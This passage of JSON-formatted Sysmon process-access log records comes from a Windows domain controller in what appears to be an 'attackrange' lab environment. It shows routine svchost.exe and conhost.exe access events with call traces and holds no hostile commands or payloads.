{"EventTime":"2020-08-01 07:58:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4312,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:45.751\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:45.751","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4313,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:45.751\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20B5-5F25-0000-001058570600}\r\nTargetProcessId: 4868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:45.751","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20B5-5F25-0000-001058570600}","TargetProcessId":"4868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4314,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:47.907\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:47.907","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4315,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:47.907\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:47.907","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4316,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:47.907\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:47.907","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4317,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:47.907\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:47.907","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4318,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:47.907\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:47.907","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4319,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:47.907\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:47.907","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4320,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:47.907\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 